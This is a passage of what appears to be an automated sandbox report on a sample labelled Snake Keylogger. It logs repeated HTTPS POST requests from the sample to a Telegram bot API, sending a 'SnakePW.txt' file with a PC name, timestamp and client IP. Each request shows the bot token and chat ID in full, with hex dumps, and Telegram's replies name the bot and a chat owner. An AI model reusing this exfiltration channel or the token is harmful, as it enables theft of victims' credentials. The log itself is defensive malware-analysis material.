                            Data Ascii: {"ok":true,"result":{"message_id":66967,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228842,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            196192.168.2.550079149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:02 UTC330OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757064d3a4a
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:02 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 36 34 64 33 61 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757064d3a4aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:02 UTC331INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:02 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:02 UTC332INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66968,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228842,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            197192.168.2.550080149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:02 UTC332OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570688d784
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:02 UTC333OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 36 38 38 64 37 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570688d784Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:03 UTC333INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:02 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:03 UTC333INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66969,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228842,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            198192.168.2.550082149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:03 UTC334OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575706c6d31c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:03 UTC334OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 36 63 36 64 33 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575706c6d31cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:03 UTC335INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:03 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:03 UTC335INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66970,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228843,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            199192.168.2.550084149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:03 UTC336OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575707026da8
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:03 UTC336OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 37 30 32 36 64 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575707026da8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:03 UTC336INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:03 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:03 UTC337INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66971,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228843,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.2.549770149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:39 UTC3OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d4bc2909
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:39 UTC3OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 34 62 63 32 39 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d4bc2909Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:39 UTC4INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:39 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:39 UTC4INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66748,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228759,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            20192.168.2.549788149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:46 UTC33OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d9348fb3
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:46 UTC34OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 39 33 34 38 66 62 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d9348fb3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:46 UTC34INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:46 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:46 UTC34INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66767,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228766,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            200192.168.2.550085149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:03 UTC337OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570739440e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:03 UTC338OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 37 33 39 34 34 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570739440eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:04 UTC338INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:04 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:04 UTC338INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66972,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228844,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            201192.168.2.550087149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:04 UTC339OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570774df27
                            Host: api.telegram.org
                            Content-Length: 504
